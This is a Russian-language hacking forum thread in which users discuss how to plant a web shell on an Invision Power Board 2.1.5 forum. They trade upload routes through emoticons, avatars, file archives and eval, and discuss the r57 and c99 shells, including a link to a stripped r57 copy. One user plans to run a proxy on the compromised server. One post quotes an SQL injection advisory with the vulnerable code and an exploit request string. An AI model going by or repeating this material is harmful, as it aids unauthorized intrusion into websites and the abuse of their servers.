Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Как залить шелл?
 
Есть доступ в админку форума инвизион, но заливка в emoticons не прокатывает.
Что делать, куда заливать?
 
версия сабжа?
Можно попробовать через SQL.
 
Если заливка в смайлы не катит - значит не стоят права на папку соответствующие. Попробуй залить через файловый архив (если он есть) или через автарки...
 
Версия 2.1.5 там нельзя через аватарки заливать, стоит ограничение на тип файлов. Может у кого есть чищенный сплоит от rst, я так думаю его попробовать через eval залить, а потом запустить 3proxy
 
Чистый шелл от рст есть на ВБХ вроде как...
на 2.1.5 шелл заливается в течение 2 минут при наличии кое-каких умений. Даже администраторский доступ не нужен.
 
Да знаю я про этот шелл, только там есть одна проблема, шелл от рст записывает и передает на их сайт всю инфу. Чищенный шелл я так и не нашел, вот и приходится юзать c99shell, он хотя бы не сливает инфу.
 
Цитата
adol aaa пишет:
Да знаю я про этот шелл, только там есть одна проблема, шелл от рст записывает и передает на их сайт всю инфу. Чищенный шелл я так и не нашел
а в чем собственно проблема самому rst-шелл очистить?
 
В web-шеле от РСТ есть счетчик посещений, который светит адрес установленного шела в статистике (поле Referer). Скачать скрипт с вырезанным счетчиком можно по этому адресу: www.securityinfo.ru/www/upload/tools/r57shell.txt
 
на securityinfo лежит версия 1.24, актуальная 1.31
 
Цитата
на 2.1.5 шелл заливается в течение 2 минут при наличии кое-каких умений
А можно поподробней?
 
Цитата
kevrter пишет:
на securityinfo лежит версия 1.24
в большинстве случаев и такого хватит. 1.3.1 весит больше 100 килов в полной сборке!
Ну а ежели хочешь новый чистый, чисти сам!

Цитата
Евгений пишет:
А можно поподробней?
можно
 
to Not null: Это все давно известно, я думал, ты чего нить новое напишешь
Например ты можешь мне руууским языком объяснить эскплуатацию следующей уязвимости:
Invision Power Board v2.1.5 Remote SQL Injection

Filename :- func_mod.php

Functionname :- post_delete()

Lines :- 89 To 209

Код

if ( is_array( $id ) )

{

if ( count($id) > 0 )

{

$pid = " IN(".implode(",",$id).")";

}

else

{

return FALSE;

}

}

else

{

if ( intval($id) )

{

$pid = "=$id";

}

else

{

return FALSE;

}

}



When $id = array .. the code don't check it if ( INTVAL )

Код

if ( count($id) > 0 )

{

$pid = " IN(".implode(",",$id).")";

}



Then We Can Do SQL Injection Here >>

Код

$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );



And Here >>

Код

$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );



Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit :( Baaad :(

Exm. To Exploit

1- First Add 2 Post

2- Check It To Delete

3- Edit String Query By HTTPLiveHeader

Код

act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete



Вот что интересно: эта бага тока для версии 2.1.5 или ниже тоже можно - насколько я знаю функция удаления сообщения не активирована на версиях ниже 2.1.5 или я ошибаюсь?
 
Цитата
to Not null: Это все давно известно, я думал, ты чего нить новое напишешь
А я и не говорил, что это что-то супер-новое. На дату написания статьи посмотри.А актуально будет еще долго.
И та бага, что ты описал, давным-давно валяется в паблике. Ты хоть читал полное описание? Видел слова автора вконце?

Цитата
We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit :( Baaad :(
Ну и чуть ниже некоторые рекомендации.
 
В том та вся и загвоздка -  эту багу я воще не знал, потому у тебя и спросил
 
Цитата
Razor пишет:
В web-шеле от РСТ есть счетчик посещений, который светит адрес установленного шела в статистике (поле Referer). Скачать скрипт с вырезанным счетчиком можно по этому адресу: www.securityinfo.ru/www/upload/tools/r57shell.txt

проще самому этот аппендикс вырезать
 
Тем более, что код открытый...
Имею в ввиду, что не как с программой с закрытым кодом )
знания пхп и вперед ), даже не большие знания...
Страницы: 1
Читают тему